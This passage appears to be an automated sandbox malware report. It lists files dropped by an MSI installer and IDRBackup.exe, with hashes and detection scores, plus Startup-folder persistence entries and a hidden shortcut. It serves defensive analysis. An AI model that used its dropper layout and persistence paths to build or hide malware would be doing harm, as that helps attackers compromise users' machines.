                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target IDRBackup.exe, PID 7680 because there are no executed functions
                                                                                    • Not all processes were analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    Time | Type | Description
                                                                                    01:24:39 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT9FDB.tmp
                                                                                    01:24:52 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ProtectWordpad5.lnk
                                                                                    20:25:02 | API Interceptor | 11x Sleep call for process: comvalidate_ljv3.exe modified
                                                                                    20:25:50 | API Interceptor | 1x Sleep call for process: cmd.exe modified
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):9984
                                                                                                Entropy (8bit):5.705522191667074
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:v5KD/9BYWf34svsasz1Doi7eAXoXBwU07CsThqwU07C6jlYXCXcPThqAHS2FXhNg:vicWf34C1g1Doi7eJP0GII0GrTbrpG
                                                                                                MD5:C9FA159FC780A7C04DAFACC8526F80F6
                                                                                                SHA1:F81F124C561DDE1C499EF71503233A44775C9463
                                                                                                SHA-256:854576BF8812E27351D1F647BAAC259CF1E2A57882AA7D252F7D703EFD5C0931
                                                                                                SHA-512:3D8EA11AB8002E7FB00A8C137BB1D160D049C0D138CF60E1D532DFB0DEF35B92319A34106932EDF5AA746EF969AC76F80AE92B01A06940AA8A110D0E6398E765
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5662857
                                                                                                Entropy (8bit):7.71787152804132
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:ERR//Nnr5YXNOnk7bxSCsPcp6zpHkZZFG2SNme2WKKk:ERR//V5I0CNeHyY2SNmlW1k
                                                                                                MD5:E85641DE34CE9C7FBE355D501F33CFE4
                                                                                                SHA1:D83E45325FB6651D3812CBDF0600BA6FF6C7EF88
                                                                                                SHA-256:DBB65F07DE18222E2D40C0B2C95CC0287F76B8919B5D2226D091CB0E3C0411AD
                                                                                                SHA-512:9B4A83EE18058DE22B2A78F771696809FC4806D61C7FEAA1165D30F88D52FC652C5CBB0263FF445F5FB795834FD011E8078DC9ED4324C43545329EC20AA10513
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5662857
                                                                                                Entropy (8bit):7.717871592775653
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:LRR//Nnr5YXNOnk7bxSCsPcp6zpHkZZFG2SNme2WKKk:LRR//V5I0CNeHyY2SNmlW1k
                                                                                                MD5:41C90084229BBC492F8488511E0BC9E5
                                                                                                SHA1:15F06E9BE70CAC2E63E2BA9F7E905BD3AA09FE2D
                                                                                                SHA-256:D2B75C1033542E7B3FECA25014C2A7F3A61CC162021E7DB1DD1B8A24ACB94A14
                                                                                                SHA-512:426CC0542EF0A75E6D698E1EA30E1D0012EEC811815CC7D611A7D19A91E75E46D9D632E75F7EFE7BE60330EAC81BC60CD94B5A60C64ED8503284024668A5E3A8
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5662857
                                                                                                Entropy (8bit):7.717871305623548
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:HRR//Nnr5YXNOnk7bxSCsPcp6zpHkZZFG2SNme2WKKk:HRR//V5I0CNeHyY2SNmlW1k
                                                                                                MD5:425A57A1482E280D071DE0ECA44CBA58
                                                                                                SHA1:5C514469B5725F1AAE37CED64D875563F027B523
                                                                                                SHA-256:688C51D5E57049E4EF9D07173E13BCBB4DEE236051FD170C832AABB281FE1F56
                                                                                                SHA-512:92C227D2E1A9C14DC83B2F3BB59AF5C4C2F05A228800EF890929AC05C6AE34009E44D06D3D18DA0DA5705EA29AC949DC8A942C20F2D5A51519EB076FCC131FA9
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2137808
                                                                                                Entropy (8bit):6.8117077805342365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:fsLSdP5XOFS5DbCVVtBF8SIIa0awy+qW5M8hbGY7WVaQX/VjjFD7YpmTfWD3B7jn:ELmVOFUK1JIIa0awN5d7WVaQX1T+z9D
                                                                                                MD5:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                SHA1:2A2ECBBD4840C486B3507A18307369336EC5A1AA
                                                                                                SHA-256:5AE3838D77C2102766538F783D0A4B4205E7D2CDBA4E0AD2AB332DC8AB32FEA9
                                                                                                SHA-512:4E6BD3F85C71A8FF0DB1E92675295D5BBD0EE8CF24D4DF4150A922E9C25FA1F7116263AC4E55C9A9420416FD0388DB593C1FE43D22D0A8D25CAA20EEB13F5080
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: es.hta, Detection: malicious, Browse
                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                • Filename: MOD_200.pdf.lnk, Detection: malicious, Browse
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):60928
                                                                                                Entropy (8bit):6.076596555078833
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:2d3yLVTcRkZrVlqE6BY6TalNPzrrSRTy3IXGX8prYXDRMLu8Vp4:GCpTzriE6BYrrJIXJpCRM68Vp4
                                                                                                MD5:F2986DC64A9ECCFAD317CB01A42954BC
                                                                                                SHA1:84838D33FDE059E3AED7AD38B09642C802F0EAC8
                                                                                                SHA-256:86C75285D2E51B8E5BA2191C6B1888BBE69437B767E19C530771C08F6FAC7C46
                                                                                                SHA-512:B8DE5D2450B7685A865A3565965E786745E63ADB4F926896DD67D6E1BEA802FCD2A03A61E464CA1F7153FF90A0582E92D0946A558F4FC7468CA035853C7E5E73
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: es.hta, Detection: malicious, Browse
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4526833
                                                                                                Entropy (8bit):7.966185784897977
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:HNfg5MzZZKcUrhgrhiNcqM7VFHrCgRUVpS5QMsWpBs3KKLnb9owzajg+l1:HuKZBYwhiNcqM7npRsS5QMD8jb9owu1
                                                                                                MD5:AE698161CA0CD6BAF53788C39B7D55A8
                                                                                                SHA1:C03513DC4712FE46517159FAF2D7BCCDF4DA2C58
                                                                                                SHA-256:ED4905E10A4416F1C878EBBADAEC55A76490BAF8B9EDBBD99DB17FB62311FF64
                                                                                                SHA-512:A6D4391E39C77A30900B7FB377060E233FF5D7A770BF0979CACC88108263BF4BFBEE369BD95A4AFF07C99EE20B12A15D9B9BF399B33645614985239B5CCFC44B
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):214016
                                                                                                Entropy (8bit):6.88876124830787
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:wN/kSQxE6qeM/k4qTl5L5e5+53WCG1CbF/Frf1:PqeM/k4qR5L5e5+53WulZ1
                                                                                                MD5:DC6655A38FFDC3C349F13828FC8EC36E
                                                                                                SHA1:95DB71EF7BFF8C16CE955C760292BAD9F09BB06D
                                                                                                SHA-256:16126FF5DAA3787A159CF4A39AA040B8050EBB66AB90DBB97C503110EF72824A
                                                                                                SHA-512:84B85F2AAAD773CBE039022DB3D0C35263343243F0D021D7AA3086904B80DD309E6D2A93613CC774B5DB27335F4D2850151E2BC8F4648B0065F66BD3722C3D69
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):62976
                                                                                                Entropy (8bit):6.769493849077948
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:RhaUyLDjc8SqMhnJ/zq0siFsjB5mYdWtC16+C+024bQJu0D3BIBo1w4Kv57dbhrC:RNy3eqMne0sXB0IWtCLwEJhY0w1SD
                                                                                                MD5:84BC072F8EA30746F0982AFBDA3C638F
                                                                                                SHA1:F39343933FF3FC7934814D6D3B7B098BC92540A0
                                                                                                SHA-256:52019F47F96CA868FA4E747C3B99CBA1B7AA57317BF8EBF9FCBF09AA576FE006
                                                                                                SHA-512:6E7648194738E8E49E48C2450EEF1D482473CD4E5C0E83F292AC9174488F3F22A3B6BA96F07E024C2AB96613D9DB1A97084CA0B3973ED5D88502E0D28E120EF5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):445440
                                                                                                Entropy (8bit):6.727415549986866
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:mlAz49EKhEV30F8sl88nTjQ4Q50gEcW/jd+o72niVUNMa4Yn2c:mlG4ut30F8slzYlQcW/jd++2nJ6u2c
                                                                                                MD5:21068DFD733435C866312D35B9432733
                                                                                                SHA1:3D5336C676D3DD94500D0D2FE853B9DE457F10FD
                                                                                                SHA-256:835F1141ECE59C36B18E76927572D229136AEB12EFF44CB4BA98D7808257C299
                                                                                                SHA-512:54664A9E60E5A0B148FC4684125B7EAC9CFC57D0BC5838204ED587D62E44C3347C0BAE3192D5C375B6A74335B4FED4FC53248BA542C59022E9761872E09E3EE7
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):10135
                                                                                                Entropy (8bit):6.530994651641475
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YDdCjuwKxx0Iz3YDkI+eF/CpUZK794s8epq1Zo+VI+uMiDkknW9dRsaAtQxp952d:YBHOIz3YoI+eF68leE3/VYYj5Ds
                                                                                                MD5:C7E234FA36DBC2C97D2ED3974A437417
                                                                                                SHA1:41A8BB3540920F868EA669B909E61071E16497F8
                                                                                                SHA-256:ED115985C0DB3516AE57B9E2D2B8472EBA69F31ACCF7D6A078049B269958CE1C
                                                                                                SHA-512:259A929CD6665F6EC8640E629668E4A90D3261C2B1987A1DD5C51175CCA7CA9B03DF09BEFC9EAB4543F726B6423F393735CEEBF00AD2741DB0D5F14DB732AE11
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1111552
                                                                                                Entropy (8bit):6.828560472335152
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:ebhz5FWbA1msvIRzM7Rk5JZzSQ4+Is2D9Tx0gbo5:l2hTKgbo5
                                                                                                MD5:630991830AFE0B969BD0995E697AB16E
                                                                                                SHA1:FEDA243D83FBA15B23D654513DC1F0D70787BA18
                                                                                                SHA-256:B1FCB0339B9EF4860BB1ED1E5BA0E148321BE64696AF64F3B1643D1311028CB3
                                                                                                SHA-512:2F2BF30BE615F44E56ECCA972A9FCBE27187045E13C468D039645E5CC6D01F990CDE32B322965F245BC8FCCFD0920F09A0AFA1D4DE0748ED01DD9FFC1BD24692
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\rtl120.bpl, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):925744
                                                                                                Entropy (8bit):6.531971164117173
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:rRxNAQB74x0FwTuis6eCwjH+SW61zf/AD:ra+syis/LjH+S31E
                                                                                                MD5:9D255E04106BA7DCBD0BCB549E9A5A4E
                                                                                                SHA1:A9BECB85B181C37EE5A940E149754C1912A901F1
                                                                                                SHA-256:02F37A8E3D1790AC90C04BC50DE73CD1A93E27CAF833A1E1211B9CC6294ECEE5
                                                                                                SHA-512:54C54787A4CA8643271169BE403069BC5F1E319A55D6A0EBD84FB0D96F6E9BDDC52B0908541D29DB04A042B531ABD6C05073E27B0B2753196E0055B8B8200B09
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2012160
                                                                                                Entropy (8bit):6.677286319553433
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:L2gt8PRUMggrgN/5tWw+eNVEXZB5SOCwhuuYY8RPyS9YEPI5yz6T:LRSf0Ww+NpPSyzYY8c8YEPI4+T
                                                                                                MD5:849070EBD34CBAEDC525599D6C3F8914
                                                                                                SHA1:B0543D13F4D0CB787ABDAAF1D3C9A5AF17C87AFA
                                                                                                SHA-256:B6F321A48812DC922B26953020C9A60949EC429A921033CFAF1E9F7D088EE628
                                                                                                SHA-512:F2CA685B01BE9D1B77D8D924E0097DDACEE7628CC1AAD8A87D8B18A699558D38A7851E6CFF8BB2B8AE1980824588AF5C3AC75B7B4198B620144DFF61611F3AEB
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225792
                                                                                                Entropy (8bit):6.542140301791508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:F4af8kXL6nX0YXjvkWQ5vYhbNkWPFOEJ8YZbjeTl0Y25zFgYBzRKy6sB65avEtAt:Oaf8kLWL7Xov8bNxdOmrfgYmHA6I
                                                                                                MD5:7DAA2B7FE529B45101A399B5EBF0A416
                                                                                                SHA1:FD73F3561D0CEBE341A6C380681FB08841FA5CE6
                                                                                                SHA-256:2BDF023C439010CE0A786EC75D943A80A8F01363712BBF69AFC29D3E2B5306ED
                                                                                                SHA-512:8E9EC71943C412FE95563E488D91E6EF0041C16A08654FF14B11953F134007657D1E6EC95952F6B9C8B8567A35368840618DB06E5CD99ABC43AE495A3FBC6B96
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2364728
                                                                                                Entropy (8bit):6.606009669324617
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                MD5:967F4470627F823F4D7981E511C9824F
                                                                                                SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2565632
                                                                                                Entropy (8bit):6.720282075797925
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:fTeU0WaITRnbPiAGTeYUgi4t+viMs5Y7WCE2N1wlbRksZUwHucOIsBz84k:Ljxa+IlN
                                                                                                MD5:F70DBF7B7AAF190BC50F778118099E1A
                                                                                                SHA1:50741A88FD591CB68A9140384CC8578AA0E5C33F
                                                                                                SHA-256:3128C06BBA23756FE064022287364DC4716DDF5FA06ECEB38786B9CB391C53EF
                                                                                                SHA-512:5643F2783D4286404A9DEA3A3FAD76E09DD3A694126FD193AFD0040E57319C2886CB4F9B2456BA29F50E3C87E5D20A896559ED88A85E791C016205B02E6D511D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 30 00:24:11 2024, mtime=Sat Nov 30 00:24:11 2024, atime=Tue Nov 19 05:46:10 2024, length=2137808, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):906
                                                                                                Entropy (8bit):5.061305520669899
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8eqv9wYCo4BWCwdY//Ni/y5L0DZtGCnwoOjA1rHgDyJCnwi1bUxuBmV:8eeuAj+ky1ITtn9yA12yYn91bHBm
                                                                                                MD5:3E0663C5610954AB5B51413E9FA6657D
                                                                                                SHA1:BCC9F13602D3204D875C88663AA00955DED73BE9
                                                                                                SHA-256:F86160B002EFA6E76AB33AE71CDD35E6115B222BD110B19AC77DC0387CAE8B25
                                                                                                SHA-512:40B85E327165B322C3C8E4512A1B3E976C5266CD5A0DA309A310A65DE6CB09CF5AC2D0588FFC9E773EA65A7310873977A375485537A22B1F426B5E97D2CF8CA4
                                                                                                Malicious:false
                                                                                                 Preview:(binary shortcut data; embedded target path: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe)
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2565632
                                                                                                Entropy (8bit):6.720282075797925
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:fTeU0WaITRnbPiAGTeYUgi4t+viMs5Y7WCE2N1wlbRksZUwHucOIsBz84k:Ljxa+IlN
                                                                                                MD5:F70DBF7B7AAF190BC50F778118099E1A
                                                                                                SHA1:50741A88FD591CB68A9140384CC8578AA0E5C33F
                                                                                                SHA-256:3128C06BBA23756FE064022287364DC4716DDF5FA06ECEB38786B9CB391C53EF
                                                                                                SHA-512:5643F2783D4286404A9DEA3A3FAD76E09DD3A694126FD193AFD0040E57319C2886CB4F9B2456BA29F50E3C87E5D20A896559ED88A85E791C016205B02E6D511D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2137808
                                                                                                Entropy (8bit):6.8117077805342365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:fsLSdP5XOFS5DbCVVtBF8SIIa0awy+qW5M8hbGY7WVaQX/VjjFD7YpmTfWD3B7jn:ELmVOFUK1JIIa0awN5d7WVaQX1T+z9D
                                                                                                MD5:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                SHA1:2A2ECBBD4840C486B3507A18307369336EC5A1AA
                                                                                                SHA-256:5AE3838D77C2102766538F783D0A4B4205E7D2CDBA4E0AD2AB332DC8AB32FEA9
                                                                                                SHA-512:4E6BD3F85C71A8FF0DB1E92675295D5BBD0EE8CF24D4DF4150A922E9C25FA1F7116263AC4E55C9A9420416FD0388DB593C1FE43D22D0A8D25CAA20EEB13F5080
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):60928
                                                                                                Entropy (8bit):6.076596555078833
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:2d3yLVTcRkZrVlqE6BY6TalNPzrrSRTy3IXGX8prYXDRMLu8Vp4:GCpTzriE6BYrrJIXJpCRM68Vp4
                                                                                                MD5:F2986DC64A9ECCFAD317CB01A42954BC
                                                                                                SHA1:84838D33FDE059E3AED7AD38B09642C802F0EAC8
                                                                                                SHA-256:86C75285D2E51B8E5BA2191C6B1888BBE69437B767E19C530771C08F6FAC7C46
                                                                                                SHA-512:B8DE5D2450B7685A865A3565965E786745E63ADB4F926896DD67D6E1BEA802FCD2A03A61E464CA1F7153FF90A0582E92D0946A558F4FC7468CA035853C7E5E73
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4526833
                                                                                                Entropy (8bit):7.966185784897977
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:HNfg5MzZZKcUrhgrhiNcqM7VFHrCgRUVpS5QMsWpBs3KKLnb9owzajg+l1:HuKZBYwhiNcqM7npRsS5QMD8jb9owu1
                                                                                                MD5:AE698161CA0CD6BAF53788C39B7D55A8
                                                                                                SHA1:C03513DC4712FE46517159FAF2D7BCCDF4DA2C58
                                                                                                SHA-256:ED4905E10A4416F1C878EBBADAEC55A76490BAF8B9EDBBD99DB17FB62311FF64
                                                                                                SHA-512:A6D4391E39C77A30900B7FB377060E233FF5D7A770BF0979CACC88108263BF4BFBEE369BD95A4AFF07C99EE20B12A15D9B9BF399B33645614985239B5CCFC44B
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):214016
                                                                                                Entropy (8bit):6.88876124830787
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:wN/kSQxE6qeM/k4qTl5L5e5+53WCG1CbF/Frf1:PqeM/k4qR5L5e5+53WulZ1
                                                                                                MD5:DC6655A38FFDC3C349F13828FC8EC36E
                                                                                                SHA1:95DB71EF7BFF8C16CE955C760292BAD9F09BB06D
                                                                                                SHA-256:16126FF5DAA3787A159CF4A39AA040B8050EBB66AB90DBB97C503110EF72824A
                                                                                                SHA-512:84B85F2AAAD773CBE039022DB3D0C35263343243F0D021D7AA3086904B80DD309E6D2A93613CC774B5DB27335F4D2850151E2BC8F4648B0065F66BD3722C3D69
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):62976
                                                                                                Entropy (8bit):6.769493849077948
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:RhaUyLDjc8SqMhnJ/zq0siFsjB5mYdWtC16+C+024bQJu0D3BIBo1w4Kv57dbhrC:RNy3eqMne0sXB0IWtCLwEJhY0w1SD
                                                                                                MD5:84BC072F8EA30746F0982AFBDA3C638F
                                                                                                SHA1:F39343933FF3FC7934814D6D3B7B098BC92540A0
                                                                                                SHA-256:52019F47F96CA868FA4E747C3B99CBA1B7AA57317BF8EBF9FCBF09AA576FE006
                                                                                                SHA-512:6E7648194738E8E49E48C2450EEF1D482473CD4E5C0E83F292AC9174488F3F22A3B6BA96F07E024C2AB96613D9DB1A97084CA0B3973ED5D88502E0D28E120EF5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):445440
                                                                                                Entropy (8bit):6.727415549986866
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:mlAz49EKhEV30F8sl88nTjQ4Q50gEcW/jd+o72niVUNMa4Yn2c:mlG4ut30F8slzYlQcW/jd++2nJ6u2c
                                                                                                MD5:21068DFD733435C866312D35B9432733
                                                                                                SHA1:3D5336C676D3DD94500D0D2FE853B9DE457F10FD
                                                                                                SHA-256:835F1141ECE59C36B18E76927572D229136AEB12EFF44CB4BA98D7808257C299
                                                                                                SHA-512:54664A9E60E5A0B148FC4684125B7EAC9CFC57D0BC5838204ED587D62E44C3347C0BAE3192D5C375B6A74335B4FED4FC53248BA542C59022E9761872E09E3EE7
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):10135
                                                                                                Entropy (8bit):6.530994651641475
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YDdCjuwKxx0Iz3YDkI+eF/CpUZK794s8epq1Zo+VI+uMiDkknW9dRsaAtQxp952d:YBHOIz3YoI+eF68leE3/VYYj5Ds
                                                                                                MD5:C7E234FA36DBC2C97D2ED3974A437417
                                                                                                SHA1:41A8BB3540920F868EA669B909E61071E16497F8
                                                                                                SHA-256:ED115985C0DB3516AE57B9E2D2B8472EBA69F31ACCF7D6A078049B269958CE1C
                                                                                                SHA-512:259A929CD6665F6EC8640E629668E4A90D3261C2B1987A1DD5C51175CCA7CA9B03DF09BEFC9EAB4543F726B6423F393735CEEBF00AD2741DB0D5F14DB732AE11
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1111552
                                                                                                Entropy (8bit):6.828560472335152
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:ebhz5FWbA1msvIRzM7Rk5JZzSQ4+Is2D9Tx0gbo5:l2hTKgbo5
                                                                                                MD5:630991830AFE0B969BD0995E697AB16E
                                                                                                SHA1:FEDA243D83FBA15B23D654513DC1F0D70787BA18
                                                                                                SHA-256:B1FCB0339B9EF4860BB1ED1E5BA0E148321BE64696AF64F3B1643D1311028CB3
                                                                                                SHA-512:2F2BF30BE615F44E56ECCA972A9FCBE27187045E13C468D039645E5CC6D01F990CDE32B322965F245BC8FCCFD0920F09A0AFA1D4DE0748ED01DD9FFC1BD24692
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bpl, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):925744
                                                                                                Entropy (8bit):6.531971164117173
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:rRxNAQB74x0FwTuis6eCwjH+SW61zf/AD:ra+syis/LjH+S31E
                                                                                                MD5:9D255E04106BA7DCBD0BCB549E9A5A4E
                                                                                                SHA1:A9BECB85B181C37EE5A940E149754C1912A901F1
                                                                                                SHA-256:02F37A8E3D1790AC90C04BC50DE73CD1A93E27CAF833A1E1211B9CC6294ECEE5
